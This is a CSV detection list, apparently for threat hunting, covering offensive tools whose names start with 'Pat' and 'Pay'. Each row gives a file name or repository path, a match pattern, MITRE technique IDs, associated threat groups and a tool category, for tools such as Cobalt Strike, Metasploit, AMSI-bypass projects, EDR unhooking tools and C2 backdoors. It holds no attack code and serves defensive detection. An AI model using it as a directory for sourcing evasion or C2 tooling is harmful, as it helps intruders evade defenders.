"*patchAmsiOpenSession*",".{0,1000}patchAmsiOpenSession.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","N/A","10","10","378","69","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z","54501"
"*patch-amsi-x64-powershell.ps1*",".{0,1000}patch\-amsi\-x64\-powershell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","54502"
"*Patch-ETW.*",".{0,1000}Patch\-ETW\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","54503"
"*Patching NetRipper DLL*",".{0,1000}Patching\sNetRipper\sDLL.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","54504"
"*Patching-AMSI-AmsiScanBuffer-by-rasta-mouse*",".{0,1000}Patching\-AMSI\-AmsiScanBuffer\-by\-rasta\-mouse.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","image","5","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","54505"
"*PatchingAPI.exe*",".{0,1000}PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","54506"
"*Pateensy/PaensyLib/*",".{0,1000}Pateensy\/PaensyLib\/.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","54507"
"*--path docToDump.xls*",".{0,1000}\-\-path\sdocToDump\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","54508"
"*Path to a DDSpoof config file to load configuration from*",".{0,1000}Path\sto\sa\sDDSpoof\sconfig\sfile\sto\sload\sconfiguration\sfrom.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","54509"
"*path_dll_hijack.h*",".{0,1000}path_dll_hijack\.h.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","54510"
"*PATH_EXECUTION_HIJACK_PROGRAM*",".{0,1000}PATH_EXECUTION_HIJACK_PROGRAM.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","54511"
"*pathhijack.py*",".{0,1000}pathhijack\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","54512"
"*PaulNorman01/Forensia*",".{0,1000}PaulNorman01\/Forensia.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","1","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","54513"
"*PaulSec/twittor*",".{0,1000}PaulSec\/twittor.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","N/A","10","10","771","217","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z","54514"
"*PayGen*python3 generate.py*",".{0,1000}PayGen.{0,1000}python3\sgenerate\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","54515"
"*payload start tetanus*",".{0,1000}payload\sstart\stetanus.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1059 - T1105 - T1219 - T1573 - T1071","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","N/A","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","54516"
"*payload.c *",".{0,1000}payload\.c\s.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z","54517"
"*payload.csproj*",".{0,1000}payload\.csproj.{0,1000}","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","Lateral Movement","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","N/A","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","54518"
"*payload.sct *",".{0,1000}payload\.sct\s.{0,1000}","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","Lateral Movement","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","N/A","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","54519"
"*payload/encryptor_remote.py*",".{0,1000}payload\/encryptor_remote\.py.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","54520"
"*payload/pezor.py*",".{0,1000}payload\/pezor\.py.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","1","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","54521"
"*payload/windows/dllinject/bind_tcp_uuid*",".{0,1000}payload\/windows\/dllinject\/bind_tcp_uuid.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","54522"
"*payload_bootstrap_hint*",".{0,1000}payload_bootstrap_hint.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54523"
"*payload_creator.py*",".{0,1000}payload_creator\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","54524"
"*payload_encryption.py*",".{0,1000}payload_encryption\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","54525"
"*payload_inject.rb*",".{0,1000}payload_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54526"
"*payload_local*",".{0,1000}payload_local.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","54527"
"*payload_msf.c*",".{0,1000}payload_msf\.c.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","54528"
"*payload_msf.exe*",".{0,1000}payload_msf\.exe.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","54529"
"*payload_scripts.cna*",".{0,1000}payload_scripts\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54530"
"*payload_scripts/sleepmask*",".{0,1000}payload_scripts\/sleepmask.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54531"
"*payload_section.cpp*",".{0,1000}payload_section\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","N/A","10","","N/A","","","","54532"
"*payload_section.hpp*",".{0,1000}payload_section\.hpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","N/A","10","","N/A","","","","54533"
"*payload_spellshell.c*",".{0,1000}payload_spellshell\.c.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","54534"
"*payload_spellshell.exe*",".{0,1000}payload_spellshell\.exe.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","54535"
"*payload_tidy.rb*",".{0,1000}payload_tidy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54536"
"*Payload_Type/freyja/*",".{0,1000}Payload_Type\/freyja\/.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","54537"
